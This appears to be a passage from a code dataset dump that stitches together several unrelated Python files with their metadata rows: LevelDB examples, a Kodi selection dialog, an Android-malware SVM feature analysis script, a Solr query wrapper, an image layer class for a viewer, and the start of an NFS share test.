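    return restored.x(41)  # 42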
@contextlib.contextmanager
def clear_mpi_env_vars():
"""
from mpi4py import MPI will call MPI_Init by default. If the child process has MPI environment variables, MPI will think that the child process is an MPI process just like the parent and do bad things such as hang.
This context manager is a hacky way to clear those environment variables temporarily such as when we are starting multiprocessing
Processes.
"""
removed_environment = {}
for k, v in list(os.environ.items()):
for prefix in ['OMPI_', 'PMI_']:
if k.startswith(prefix):
removed_environment[k] = v
del os.environ[k]
try:
yield
finally:
os.environ.update(removed_environment)
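# Hedged usage sketch (not in the original module): the intended pattern for
# the context manager above when spawning worker processes. `target` is any
# picklable callable supplied by the caller; defined only, never executed.
def _example_spawn_without_mpi_env(target):
    import multiprocessing as mp
    with clear_mpi_env_vars():
        proc = mp.Process(target=target)
        proc.start()
    return proc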
| mit | 827,595,282,135,824,100 | 26.780269 | 219 | 0.606295 | false | 4.387394 | false | false | false |
sangwook236/SWDT | sw_dev/python/ext/test/database/leveldb_main.py | 1 | 3320 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import json
import numpy as np
#import caffe
import leveldb
def write_to_db_example(use_caffe_datum=False):
N = 1000
X = np.zeros((N, 3, 32, 32), dtype=np.uint8)
y = np.zeros(N, dtype=np.int64)
leveldb_dir_path = './myleveldb'
db = leveldb.LevelDB(leveldb_dir_path, create_if_missing=True)
if use_caffe_datum:
#import caffe
import caffe_pb2
for i in range(N):
# REF [site] >> https://github.com/BVLC/caffe/blob/master/src/caffe/proto/caffe.proto
#datum = caffe.proto.caffe_pb2.Datum()
datum = caffe_pb2.Datum()
datum.channels = X.shape[1]
datum.height = X.shape[2]
datum.width = X.shape[3]
datum.data = X[i].tobytes() # or .tostring() if numpy < 1.9.
datum.label = int(y[i])
str_id = '{:08}'.format(i)
# The encode is only essential in Python 3.
db.Put(str_id.encode('ascii'), datum.SerializeToString())
else:
for i in range(N):
datum = {
'channels': X.shape[1],
'height': X.shape[2],
'width': X.shape[3],
'data': X[i].tolist(),
'label': int(y[i]),
}
str_id = '{:08}'.format(i)
# The encode is only essential in Python 3.
db.Put(str_id.encode('ascii'), json.dumps(datum).encode('ascii'))
#db.Delete(b'00000000')
#--------------------
print(db.GetStats())
def read_from_db_example(use_caffe_datum=False):
leveldb_dir_path = './myleveldb'
db = leveldb.LevelDB(leveldb_dir_path, create_if_missing=True)
key = b'00000000'
try:
raw_datum = db.Get(key)
except KeyError as ex:
print('Invalid key, {}.'.format(key))
return
if use_caffe_datum:
#import caffe
import caffe_pb2
# REF [site] >> https://github.com/BVLC/caffe/blob/master/src/caffe/proto/caffe.proto
#datum = caffe.proto.caffe_pb2.Datum()
datum = caffe_pb2.Datum()
datum.ParseFromString(raw_datum)
x = np.fromstring(datum.data, dtype=np.uint8)
x = x.reshape(datum.channels, datum.height, datum.width)
y = datum.label
else:
datum = json.loads(raw_datum.decode('ascii'))
x = np.array(datum['data'], dtype=np.uint8)
x = x.reshape(datum['channels'], datum['height'], datum['width'])
y = datum['label']
print(x.shape, y)
def key_value_example(use_caffe_datum=False):
leveldb_dir_path = './myleveldb'
db = leveldb.LevelDB(leveldb_dir_path, create_if_missing=True)
if use_caffe_datum:
#import caffe
import caffe_pb2
for k, v in db.RangeIter():
# REF [site] >> https://github.com/BVLC/caffe/blob/master/src/caffe/proto/caffe.proto
#datum = caffe.proto.caffe_pb2.Datum()
datum = caffe_pb2.Datum()
datum.ParseFromString(v)
x = np.fromstring(datum.data, dtype=np.uint8)
x = x.reshape(datum.channels, datum.height, datum.width)
y = datum.label
print(k.decode(), x.shape, y)
else:
for k, v in db.RangeIter():
datum = json.loads(v.decode('ascii'))
x = np.array(datum['data'], dtype=np.uint8)
x = x.reshape(datum['channels'], datum['height'], datum['width'])
y = datum['label']
print(k.decode(), x.shape, y)
def main():
# Usage:
# For using Caffe Datum:
# protoc --python_out=. caffe.proto
use_caffe_datum = False
write_to_db_example(use_caffe_datum)
#read_from_db_example(use_caffe_datum)
#key_value_example(use_caffe_datum)
#--------------------------------------------------------------------
if '__main__' == __name__:
main()
| gpl-3.0 | -4,361,505,926,520,029,700 | 26.666667 | 88 | 0.636747 | false | 2.620363 | false | false | false |
dannyperry571/theapprentice | script.module.nanscrapers/lib/nanscrapers/dialogs.py | 1 | 7998 | from threading import Thread, RLock
import xbmc
import xbmcaddon
import xbmcgui
def select_ext(title, populator, tasks_count, sort_function = None):
addonPath = xbmcaddon.Addon().getAddonInfo('path').decode('utf-8')
dlg = SelectorDialog("DialogSelect.xml", addonPath, title=title,
populator=populator, steps=tasks_count, sort_function=sort_function)
with ExtendedDialogHacks():
dlg.doModal()
selection = dlg.get_selection()
del dlg
return selection
class FanArtWindow(xbmcgui.WindowDialog):
def __init__(self):
control_background = xbmcgui.ControlImage(0, 0, 1280, 720, xbmcaddon.Addon().getAddonInfo('fanart'))
self.addControl(control_background)
fanart = xbmc.getInfoLabel('ListItem.Property(Fanart_Image)')
if fanart and fanart != "Fanart_Image":
control_fanart = xbmcgui.ControlImage(0, 0, 1280, 720, fanart)
self.addControl(control_fanart)
class ExtendedDialogHacks(object):
def __init__(self):
self.active = False
self.hide_progress = False
self.hide_info = False
self.autohidedialogs = False
if self.autohidedialogs:
self.hide_progress = False
self.hide_info = False
if not self.hide_progress and not self.hide_info:
self.autohidedialogs = False
def __enter__(self):
self.active = True
# self.numeric_keyboard = None
self.fanart_window = FanArtWindow()
## Keyboard hack
# if plugin.get_setting(SETTING_ADVANCED_KEYBOARD_HACKS, converter=bool):
# self.numeric_keyboard = xbmcgui.Window(10109)
# Thread(target = lambda: self.numeric_keyboard.show()).start()
# wait_for_dialog('numericinput', interval=50)
# Show fanart background
self.fanart_window.show()
# Run background task
if self.autohidedialogs:
Thread(target=self.background_task).start()
def background_task(self):
xbmc.sleep(1000)
while not xbmc.abortRequested and self.active:
if self.hide_progress:
active_window = xbmcgui.getCurrentWindowDialogId()
if active_window in [10101, 10151]:
xbmc.executebuiltin("Dialog.Close(%d, true)" % active_window)
if self.hide_info:
if xbmc.getCondVisibility("Window.IsActive(infodialog)"):
xbmc.executebuiltin('Dialog.Close(infodialog, true)')
xbmc.sleep(100)
def __exit__(self, exc_type, exc_value, traceback):
self.active = False
# if self.numeric_keyboard is not None:
# self.numeric_keyboard.close()
# del self.numeric_keyboard
# xbmc.executebuiltin("Dialog.Close(numericinput, true)")
self.fanart_window.close()
del self.fanart_window
class SelectorDialog(xbmcgui.WindowXMLDialog):
def __init__(self, *args, **kwargs):
xbmcgui.WindowXMLDialog.__init__(self)
self.title = kwargs['title']
self.populator = kwargs['populator']
self.steps = kwargs['steps']
self.sort_function = kwargs['sort_function']
self.items = []
self.selection = None
self.insideIndex = -1
self.completed_steps = 0
self.thread = None
self.lock = RLock()
def get_selection(self):
""" get final selection """
return self.selection
def onInit(self):
# set title
self.label = self.getControl(1)
self.label.setLabel(self.title)
# Hide ok button
self.getControl(5).setVisible(False)
# Get active list
try:
self.list = self.getControl(6)
self.list.controlLeft(self.list)
self.list.controlRight(self.list)
self.getControl(3).setVisible(False)
except:
self.list = self.getControl(3)
self.setFocus(self.list)
# populate list
self.thread = Thread(target=self._populate)
self.thread.start()
def onAction(self, action):
if action.getId() in (9, 10, 92, 216, 247, 257, 275, 61467, 61448,):
if self.insideIndex == -1:
self.close()
else:
self._inside_root(select=self.insideIndex)
def onClick(self, controlID):
if controlID == 6 or controlID == 3:
num = self.list.getSelectedPosition()
if num >= 0:
if self.insideIndex == -1:
self._inside(num)
else:
self.selection = self.items[self.insideIndex][1][num]
self.close()
def onFocus(self, controlID):
if controlID in (3, 61):
self.setFocus(self.list)
def _inside_root(self, select=-1):
with self.lock:
self.list.reset()
for source, links in self.items:
if len(links) > 1:
source += " >>"
listitem = xbmcgui.ListItem(source)
try:
icon = xbmcaddon.Addon(id=links[0]['path'].split("/")[2]).getAddonInfo('icon')
listitem.setIconImage(icon)
except:
pass
self.list.addItem(listitem)
if select >= 0:
self.list.selectItem(select)
self.insideIndex = -1
def _inside(self, num):
if num == -1:
self._inside_root(select=self.insideIndex)
return
with self.lock:
source, links = self.items[num]
if len(links) == 1:
self.selection = links[0]
self.close()
return
self.list.reset()
for item in links:
listitem = xbmcgui.ListItem(item['label'])
listitem.setProperty("Path", item['path'])
try:
pluginid = item['path'].split("/")[2]
icon = xbmcaddon.Addon(id=pluginid).getAddonInfo('icon')
listitem.setIconImage(icon)
except:
pass
self.list.addItem(listitem)
self.insideIndex = num
def step(self):
self.completed_steps += 1
progress = self.completed_steps * 100 / self.steps
self.label.setLabel(u"{0} - {1:d}% ({2}/{3})".format(self.title, progress,
self.completed_steps, self.steps))
def _populate(self):
xbmc.sleep(500) # Delay population to let ui settle
self.label.setLabel(self.title)
for result in self.populator():
self.step()
if not result:
continue
with self.lock:
# Remember selected item
selectedItem = None
if self.insideIndex == -1:
selectedIndex = self.list.getSelectedPosition()
else:
selectedIndex = self.insideIndex
if selectedIndex >= 0:
selectedItem = self.items[selectedIndex]
# Add new item
self.items.extend(result)
if self.sort_function:
self.items = sorted(self.items, key = self.sort_function)
#self.items.sort()
# Retrived new selection-index
if selectedItem is not None:
selectedIndex = self.items.index(selectedItem)
if self.insideIndex != -1:
self.insideIndex = selectedIndex
# Update only if in root
if self.insideIndex == -1:
self._inside_root(select=selectedIndex)
self.setFocus(self.list)
pass
| gpl-2.0 | -3,316,285,077,037,326,300 | 31.91358 | 108 | 0.53801 | false | 4.304629 | false | false | false |
hgascon/adagio | adagio/core/featureAnalysis.py | 1 | 6579 | #!/usr/bin/python
# ADAGIO Android Application Graph-based Classification
# featureAnalysis.py >> Analysis of features from SVM linear model
# Copyright (c) 2016 Hugo Gascon <[email protected]>
import os
import numpy as np
import networkx as nx
from random import shuffle
from adagio.common import ml
"""
Example:
import featureAnalysis as fa
w_binary = clf.best_estimator_.coef_[0]
w_agg = fa.aggregate_binary_svm_weights(w, 13)
"""
def print_largest_weights(w_agg, n):
""" Print the largest weights
"""
idx = w_agg.argsort()[::-1][:n]
w_agg_highest = w_agg[idx]
labels = [np.binary_repr(i, 15) for i in idx]
print(zip(w_agg_highest, labels))
def aggregate_binary_svm_weights(w_binary, expansion_bits):
""" Return the aggregated version of the SVM weight vector considering
the binary representation length of the original non-binary feature.
Args:
w_binary: an array of SVM weights related to binary features.
expansion_bits: the number of bits used to represent each feature in
the original feature vector.
Returns:
w: the aggregated version of the SVM weight vector
"""
feature_idx = len(w_binary) / expansion_bits # should be a int
w = np.array([sum(w_binary[expansion_bits * i:expansion_bits * (i + 1)])
for i in range(feature_idx)])
return w
def compute_neighborhoods_per_weights(d, w, n_weights, n_files=300):
""" Write report with info about highed ranked neighborhoods in a samples
according to the weights learnt by the linear SVM model.
Args:
d: directory of the files to be processed
w: linear SVM weights
n_weights: number of weights to analyze
n_files: number of files to process from directory d
Returns:
Outputs the file feature_analysis.txt
"""
files = read_files(d, "fcgnx", n_files)
sorted_weights_idx = w.argsort()[::-1]
f_out = "feature_analysis.txt".format(n_weights)
print("[*] Writing file {0}...".format(f_out))
fd = open(f_out, 'wb')
# fd.write("Total number of weights in SVM model: {0}\n".format(len(w)))
# fd.write("Selected number of highest weights per sample: {0}\n".format(n_weights))
for f in files:
fn = os.path.join(d, f)
neighborhoods, n_nodes = get_high_ranked_neighborhoods(fn, w,
sorted_weights_idx,
n_weights)
try:
if neighborhoods:
fd.write("\n\n#########################################\n\n")
fd.write(os.path.basename(f)+"\n\n")
fd.write("nodes: {0}\n\n".format(n_nodes))
fd.write("\n".join(neighborhoods))
except:
pass
fd.close()
print("[*] File written.")
def get_high_ranked_neighborhoods(fcgnx_file, w, sorted_weights_idx,
show_small=False, weights=1):
# g = FCGextractor.build_cfgnx(fcgnx_file)
g = nx.read_gpickle(fcgnx_file)
g_hash = ml.neighborhood_hash(g)
neighborhoods = []
remaining_weights = weights
for idx in sorted_weights_idx:
if remaining_weights > 0:
label_bin = np.binary_repr(idx, 15)
label = np.array([int(i) for i in label_bin])
matching_neighborhoods = []
for m, nh in g_hash.node.iteritems():
if np.array_equal(nh["label"], label):
neighbors_l = g_hash.neighbors(m)
if neighbors_l:
neighbors = '\n'.join([str(i) for i in neighbors_l])
matching_neighborhoods.append("{0}\n{1}\n{2}\n".format(w[idx],
m, neighbors))
else:
if show_small:
matching_neighborhoods.append("{0}\n{1}\n".format(w[idx], m))
if matching_neighborhoods:
remaining_weights -= 1
neighborhoods += matching_neighborhoods
else:
n_nodes = g_hash.number_of_nodes()
del g
del g_hash
return neighborhoods, n_nodes
def add_weights_to_nodes(g, w, show_labels=True):
g_hash = ml.neighborhood_hash(g)
# initialize the weight for every node in g_hash
for n, nh in g_hash.node.iteritems():
idx = int("".join([str(i) for i in nh["label"]]), 2)
w_nh = w[idx]
g_hash.node[n]["label"] = w_nh
# create a copy of the weighted graph
g_hash_weighted = g_hash.copy()
# aggregate the weights of each node with the
# original weight of its caller
for n, nh in g_hash.node.iteritems():
for neighbor in g_hash.neighbors(n):
g_hash_weighted.node[neighbor]["label"] += g_hash.node[n]["label"]
# create array of the node weigths
g_weights = []
for n, nh in g_hash_weighted.node.iteritems():
g_weights.append(nh["label"])
# normalize weight between 0.5 and 1 to plot
g_weights = np.array(g_weights)
g_weights.sort()
g_weights_norm = normalize_weights(g_weights)
g_weights_norm = g_weights_norm[::-1]
d_w_norm = dict(zip(g_weights, g_weights_norm))
# add normalized weight as color to each node
for n, nh in g_hash_weighted.node.iteritems():
w = g_hash_weighted.node[n]["label"]
g_hash_weighted.node[n]["style"] = "filled"
g_hash_weighted.node[n]["fillcolor"] = "0.000 0.000 {0}".format(d_w_norm[w])
# write function name in the label of the node or remove label
if show_labels:
for n, nh in g_hash_weighted.node.iteritems():
node_text = (n[0].split("/")[-1] + n[1] + "\n" +
str(g_hash_weighted.node[n]["label"]))
g_hash_weighted.node[n]["label"] = node_text
else:
for n, nh in g_hash_weighted.node.iteritems():
g_hash_weighted.node[n]["label"] = ""
return g_hash_weighted
def normalize_weights(a, imin=0.0, imax=1.0):
dmin = a.min()
dmax = a.max()
return imin + (imax - imin) * (a - dmin) / (dmax - dmin)
def read_files(d, file_extension, max_files=0):
files = []
for fn in os.listdir(d):
if fn.lower().endswith(file_extension):
files.append(os.path.join(d, fn))
shuffle(files)
# if max_files is 0, return all the files in dir
if max_files == 0:
max_files = len(files)
files = files[:max_files]
return files
| gpl-2.0 | -6,568,646,348,829,557,000 | 32.912371 | 89 | 0.573035 | false | 3.540904 | false | false | false |
voutilad/courtlistener | cl/lib/scorched_utils.py | 1 | 2383 | from scorched import SolrInterface
from scorched.search import Options, SolrSearch
class ExtraSolrInterface(SolrInterface):
"""Extends the SolrInterface class so that it uses the ExtraSolrSearch
class.
"""
def __init__(self, *args, **kwargs):
super(ExtraSolrInterface, self).__init__(*args, **kwargs)
def query(self, *args, **kwargs):
"""
:returns: SolrSearch -- A solrsearch.
Build a solr query
"""
# Change this line to hit our class instead of SolrSearch. All the rest
# of this class is the same.
q = ExtraSolrSearch(self)
if len(args) + len(kwargs) > 0:
return q.query(*args, **kwargs)
else:
return q
class ExtraSolrSearch(SolrSearch):
"""Base class for common search options management"""
option_modules = ('query_obj', 'filter_obj', 'paginator',
'more_like_this', 'highlighter', 'postings_highlighter',
'faceter', 'grouper', 'sorter', 'facet_querier',
'debugger', 'spellchecker', 'requesthandler',
'field_limiter', 'parser', 'pivoter', 'facet_ranger',
'term_vectors', 'stat', 'extra')
def _init_common_modules(self):
super(ExtraSolrSearch, self)._init_common_modules()
self.extra = ExtraOptions()
def add_extra(self, **kwargs):
newself = self.clone()
newself.extra.update(kwargs)
return newself
_count = None
def count(self):
if self._count is None:
# We haven't gotten the count yet. Get it. Clone self for this
# query or else we'll set rows=0 for remainder.
newself = self.clone()
r = newself.add_extra(rows=0).execute()
if r.groups:
total = getattr(r.groups, r.group_field)['ngroups']
else:
total = r.result.numFound
# Set the cache
self._count = total
return self._count
class ExtraOptions(Options):
def __init__(self, original=None):
if original is None:
self.option_dict = {}
else:
self.option_dict = original.option_dict.copy()
def update(self, extra_options):
self.option_dict.update(extra_options)
def options(self):
return self.option_dict
| agpl-3.0 | -1,908,037,165,999,588,600 | 31.202703 | 79 | 0.571129 | false | 3.98495 | false | false | false |
zpincus/RisWidget | ris_widget/layer.py | 1 | 17002 | # This code is licensed under the MIT License (see LICENSE file for details)
from PyQt5 import Qt
import textwrap
import warnings
import numpy
from . import image
from . import histogram
from . import qt_property
from . import async_texture
SHADER_PROP_HELP = """The GLSL fragment shader used to render an image within a layer stack is created
by filling in the $-values from the following template (somewhat simplified) with the corresponding
attributes of the layer. A template for layer in the stack is filled in and the
final shader is the the concatenation of all the templates.
NB: In case of error, calling del on the layer attribute causes it to revert to the default value.
// Simplified GLSL shader code:
// Below repeated for each layer
uniform sampler2D tex;
vec4 color_transform(vec4 in_, vec4 tint, float rescale_min, float rescale_range, float gamma_scalar)
{
vec4 out_;
out_.a = in_.a;
vec3 gamma = vec3(gamma_scalar, gamma_scalar, gamma_scalar);
${transform_section}
// default value for transform_section:
// out_.rgb = pow(clamp((in_.rgb - rescale_min) / (rescale_range), 0.0f, 1.0f), gamma); out_.rgba *= tint;
return clamp(out_, 0, 1);
}
s = texture2D(tex, tex_coord);
s = color_transform(
${getcolor_expression}, // default getcolor_expression for a grayscale image is: vec4(s.rrr, 1.0f)
${tint}, // [0,1] normalized RGBA component values that scale results of getcolor_expression
rescale_min, // [0,1] scaled version of layer.min
rescale_range, // [0,1] scaled version of layer.max - layer.min
${gamma});
sca = s.rgb * s.a;
${Layer.BLEND_FUNCTIONS[${blend_function}]}
da = clamp(da, 0, 1);
dca = clamp(dca, 0, 1);
// end per-layer repeat
gl_FragColor = vec4(dca / da, da * layer_stack_item_opacity);"""
def coerce_to_str(v):
return '' if v is None else str(v)
def coerce_to_tint(v):
v = tuple(map(float, v))
if len(v) not in (3,4) or not all(map(lambda v_: 0 <= v_ <= 1, v)):
raise ValueError('The iteraterable assigned to tint must represent 3 or 4 real numbers in the interval [0, 1].')
if len(v) == 3:
v += (1.0,)
return v
def coerce_to_radius(v):
if v == '' or v is None:
return None
else:
v = float(v)
if v <= 0:
raise ValueError('Radius must be positive')
if v > 0.707:
v = None # larger radius and image is un-masked...
return v
class Layer(qt_property.QtPropertyOwner):
""" The class Layer contains properties that control Image presentation.
Properties:
visible
mask_radius
auto_min_max
min
max
gamma
histogram_min
histogram_max
getcolor_expression
tint
transform_section
blend_function
opacity
The 'changed' signal is emitted when any property impacting image presentation
is modified or image data is explicitly changed or refreshed. Each specific
property also has its own changed signal, such as 'min_changed' &c.
"""
GAMMA_RANGE = (0.0625, 16.0)
IMAGE_TYPE_TO_GETCOLOR_EXPRESSION = {
'G' : 'vec4(s.rrr, 1.0f)',
'Ga' : 'vec4(s.rrr, s.g)',
'rgb' : 'vec4(s.rgb, 1.0f)',
'rgba': 's'}
DEFAULT_TRANSFORM_SECTION = 'out_.rgb = pow(clamp((in_.rgb - rescale_min) / (rescale_range), 0.0f, 1.0f), gamma); out_.rgba *= tint;'
# Blend functions adapted from http://dev.w3.org/SVG/modules/compositing/master/
BLEND_FUNCTIONS = {
'normal' : ('dca = sca + dca * (1.0f - s.a);', # AKA src-over
'da = s.a + da - s.a * da;'),
'multiply' : ('dca = sca * dca + sca * (1.0f - da) + dca * (1.0f - s.a);',
'da = s.a + da - s.a * da;'),
'screen' : ('dca = sca + dca - sca * dca;',
'da = s.a + da - s.a * da;'),
'overlay' : ('isa = 1.0f - s.a; osa = 1.0f + s.a;',
'ida = 1.0f - da; oda = 1.0f + da;',
'sada = s.a * da;',
'for(i = 0; i < 3; ++i){',
' dca[i] = (dca[i] + dca[i] <= da) ?',
' (sca[i] + sca[i]) * dca[i] + sca[i] * ida + dca[i] * isa :',
' sca[i] * oda + dca[i] * osa - (dca[i] + dca[i]) * sca[i] - sada;}',
'da = s.a + da - sada;'),
# 'src' : ('dca = sca;',
# 'da = s.a;'),
# 'dst-over' : ('dca = dca + sca * (1.0f - da);',
# 'da = s.a + da - s.a * da;'),
# 'plus' : ('dca += sca;',
# 'da += s.a;'),
# 'difference':('dca = (sca * da + dca * s.a - (sca + sca) * dca) + sca * (1.0f - da) + dca * (1.0f - s.a);',
# 'da = s.a + da - s.a * da;')
}
for k, v in BLEND_FUNCTIONS.items():
BLEND_FUNCTIONS[k] = ' // blending function name: {}\n '.format(k) + '\n '.join(v)
del k, v
# A change to any mutable property, including .image, potentially impacts layer presentation. For convenience, .changed is emitted whenever
# any mutable-property-changed signal is emitted, including or calling .image.refresh(). Note that the .changed signal is emitted by
# the qt_property.Property instance (which involves some deep-ish Python magic)
# NB: .image_changed is the more specific signal emitted in addition to .changed for modifications to .image.
#
changed = Qt.pyqtSignal(object)
image_changed = Qt.pyqtSignal(object)
opacity_changed = Qt.pyqtSignal(object)
# below properties are necessary for proper updating of LayerStack table view when images change
dtype_changed = Qt.pyqtSignal(object)
type_changed = Qt.pyqtSignal(object)
size_changed = Qt.pyqtSignal(object)
name_changed = Qt.pyqtSignal(object)
def __init__(self, image=None, parent=None):
self._retain_auto_min_max_on_min_max_change = False
self._image = None
super().__init__(parent)
self.image_changed.connect(self.changed)
if image is not None:
self.image = image
else:
# self._image is already None, so setting self.image = None will just
# return immediately from the setter, without setting the below.
self.dtype = None
self.type = None
self.size = None
self.name = None
def __repr__(self):
image = self.image
return '{}; {}image={}>'.format(
super().__repr__()[:-1],
'visible=False, ' if not self.visible else '',
'None' if image is None else image.__repr__())
@classmethod
def from_savable_properties_dict(cls, prop_dict):
ret = cls()
for pname, pval, in prop_dict.items():
setattr(ret, pname, pval)
return ret
def get_savable_properties_dict(self):
ret = {name : prop.__get__(self) for name, prop in self._properties.items() if not prop.is_default(self)}
return ret
@property
def image(self):
return self._image
@image.setter
def image(self, new_image):
if new_image is self._image:
return
if new_image is not None:
if not isinstance(new_image, image.Image):
new_image = image.Image(new_image)
try:
new_image.changed.connect(self._on_image_changed)
except Exception as e:
if self._new_image is not None:
self._new_image.changed.disconnect(self._on_image_changed)
self._image = None
raise e
if self._image is not None:
# deallocate old texture when we're done with it.
self._image.texture.destroy()
self._image.changed.disconnect(self._on_image_changed)
self._image = new_image
if new_image is None:
self.dtype = None
self.type = None
self.size = None
self.name = None
else:
min, max = new_image.valid_range
if not (min <= self.histogram_min <= max):
del self.histogram_min # reset histogram min (delattr on the qt_property returns it to the default)
if not (min <= self.histogram_max <= max):
del self.histogram_max # reset histogram min (delattr on the qt_property returns it to the default)
self.dtype = new_image.data.dtype
self.type = new_image.type
self.size = new_image.size
self.name = new_image.name
for proxy_prop in ('dtype', 'type', 'size', 'name'):
getattr(self, proxy_prop+'_changed').emit(self)
self._on_image_changed()
def _on_image_changed(self, changed_region=None):
if self.image is not None:
# upload texture before calculating the histogram, so that the background texture upload (slow) runs in
# parallel with the foreground histogram calculation (slow)
self.image.texture.upload(changed_region)
self.calculate_histogram()
self._update_property_defaults()
if self.image is not None:
if self.auto_min_max:
self.do_auto_min_max()
else:
l, h = self.image.valid_range
if self.min < l:
self.min = l
if self.max > h:
self.max = h
self.image_changed.emit(self)
def calculate_histogram(self):
r_min = None if self._is_default('histogram_min') else self.histogram_min
r_max = None if self._is_default('histogram_max') else self.histogram_max
self.image_min, self.image_max, self.histogram = histogram.histogram(
self.image.data, (r_min, r_max), self.image.image_bits, self.mask_radius)
def generate_contextual_info_for_pos(self, x, y, idx=None):
if self.image is None:
return None
else:
image_text = self.image.generate_contextual_info_for_pos(x, y)
if image_text is None:
return None
if idx is not None:
image_text = '{}: {}'.format(idx, image_text)
return image_text
def do_auto_min_max(self):
assert self.image is not None
self._retain_auto_min_max_on_min_max_change = True
try:
self.min = max(self.image_min, self.histogram_min)
self.max = min(self.image_max, self.histogram_max)
finally:
self._retain_auto_min_max_on_min_max_change = False
visible = qt_property.Property(
default_value=True,
coerce_arg_fn=bool)
def _mask_radius_post_set(self, v):
self._on_image_changed()
mask_radius = qt_property.Property(
default_value=None,
coerce_arg_fn=coerce_to_radius,
post_set_callback=_mask_radius_post_set)
def _auto_min_max_post_set(self, v):
if v and self.image is not None:
self.do_auto_min_max()
auto_min_max = qt_property.Property(
default_value=False,
coerce_arg_fn=bool,
post_set_callback=_auto_min_max_post_set)
def _min_default(self):
if self.image is None:
return 0.0
else:
return self._histogram_min_default()
def _max_default(self):
if self.image is None:
return 65535.0
else:
return self._histogram_max_default()
def _min_max_pre_set(self, v):
if self.image is not None:
l, h = self.image.valid_range
if not l <= v <= h:
warnings.warn('min/max values for this image must be in the closed interval [{}, {}].'.format(*r))
return False
def _min_post_set(self, v):
if v > self.max:
self.max = v
if not self._retain_auto_min_max_on_min_max_change:
self.auto_min_max = False
def _max_post_set(self, v):
if v < self.min:
self.min = v
if not self._retain_auto_min_max_on_min_max_change:
self.auto_min_max = False
min = qt_property.Property(
default_value=_min_default,
coerce_arg_fn=float,
pre_set_callback=_min_max_pre_set,
post_set_callback =_min_post_set)
max = qt_property.Property(
default_value=_max_default,
coerce_arg_fn=float,
pre_set_callback=_min_max_pre_set,
post_set_callback=_max_post_set)
def _gamma_pre_set(self, v):
r = self.GAMMA_RANGE
if not r[0] <= v <= r[1]:
warnings.warn('gamma value must be in the closed interval [{}, {}].'.format(*r))
return False
gamma = qt_property.Property(
default_value=1.0,
coerce_arg_fn=float,
pre_set_callback=_gamma_pre_set)
def _histogram_min_default(self):
if self.image is None:
return 0.0
elif self.dtype == numpy.float32:
return self.image_min
else:
return float(self.image.valid_range[0])
def _histogram_max_default(self):
if self.image is None:
return 65535.0
elif self.dtype == numpy.float32:
return self.image_max
else:
return float(self.image.valid_range[1])
def _histogram_min_pre_set(self, v):
l, h = (0, 65535.0) if self.image is None else self.image.valid_range
if not l <= v <= h:
warnings.warn('histogram_min value must be in [{}, {}].'.format(l, h))
return False
if v >= self.histogram_max:
warnings.warn('histogram_min must be less than histogram_max.')
return False
def _histogram_max_pre_set(self, v):
l, h = (0, 65535.0) if self.image is None else self.image.valid_range
if not l <= v <= h:
warnings.warn('histogram_max value must be in [{}, {}].'.format(l, h))
return False
if v <= self.histogram_min:
warnings.warn('histogram_max must be greater than histogram_min.')
return False
def _histogram_min_max_post_set(self, v):
if self.image is not None:
self.calculate_histogram()
self._retain_auto_min_max_on_min_max_change = True
try:
if self.min < self.histogram_min:
self.min = self.histogram_min
if self.max > self.histogram_max:
self.max = self.histogram_max
finally:
self._retain_auto_min_max_on_min_max_change = False
if self.image is not None and self.auto_min_max:
self.do_auto_min_max()
histogram_min = qt_property.Property(
default_value=_histogram_min_default,
coerce_arg_fn=float,
pre_set_callback=_histogram_min_pre_set,
post_set_callback=_histogram_min_max_post_set)
histogram_max = qt_property.Property(
default_value=_histogram_max_default,
coerce_arg_fn=float,
pre_set_callback=_histogram_max_pre_set,
post_set_callback=_histogram_min_max_post_set)
def _getcolor_expression_default(self):
image = self.image
if image is None:
return ''
else:
return self.IMAGE_TYPE_TO_GETCOLOR_EXPRESSION[image.type]
getcolor_expression = qt_property.Property(
default_value=_getcolor_expression_default,
coerce_arg_fn=coerce_to_str,
doc=SHADER_PROP_HELP)
def _tint_pre_set(self, v):
if self.tint[3] != v:
self.opacity_changed.emit(self)
tint = qt_property.Property(
default_value=(1.0, 1.0, 1.0, 1.0),
coerce_arg_fn=coerce_to_tint,
pre_set_callback=_tint_pre_set,
doc = SHADER_PROP_HELP)
transform_section = qt_property.Property(
default_value=DEFAULT_TRANSFORM_SECTION,
coerce_arg_fn=coerce_to_str,
doc=SHADER_PROP_HELP)
def _blend_function_pre_set(self, v):
if v not in self.BLEND_FUNCTIONS:
raise ValueError('The string assigned to blend_function must be one of:\n' + '\n'.join("'" + s + "'" for s in sorted(self.BLEND_FUNCTIONS.keys())))
blend_function = qt_property.Property(
default_value='screen',
coerce_arg_fn=str,
pre_set_callback=_blend_function_pre_set,
doc=SHADER_PROP_HELP + '\n\nSupported blend_functions:\n ' + '\n '.join("'" + s + "'" for s in sorted(BLEND_FUNCTIONS.keys())))
@property
def opacity(self):
return self.tint[3]
@opacity.setter
def opacity(self, v):
v = float(v)
if not 0 <= v <= 1:
raise ValueError('The value assigned to opacity must be a real number in the interval [0, 1].')
t = list(self.tint)
t[3] = v
self.tint = t #NB: tint takes care of emitting opacity_changed
| mit | -6,145,258,606,754,030,000 | 36.449339 | 159 | 0.566404 | false | 3.583895 | false | false | false |
emc-openstack/storops | storops_test/vnx/resource/test_nfs_share.py | 1 | 6687 | # coding=utf-8
# Copyright (c) 2015 EMC Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import unicode_literals
import unittest
from hamcrest import assert_that, has_item, raises
from hamcrest import equal_to
from storops_test.vnx.nas_mock import t_nas, patch_nas
from storops.exception import VNXBackendError
from storops.vnx.resource.mover import VNXMover
from storops.vnx.resource.nfs_share import NfsHostConfig, VNXNfsShare
__author__ = 'Jay Xu'
class VNXNfsShareTest(unittest.TestCase):
@patch_nas
def test_get_all_share(self):
shares = VNXNfsShare.get(t_nas())
assert_that(len(shares), equal_to(26))
share = next(s for s in shares if s.path == '/EEE')
self.verify_share_eee(share)
@patch_nas(xml_output='abc.xml')
def test_get_share_by_path_empty(self):
def f():
path = '/EEE'
shares = VNXNfsShare.get(t_nas(), path=path)
assert_that(len(shares), equal_to(1))
assert_that(f, raises(IOError))
@patch_nas
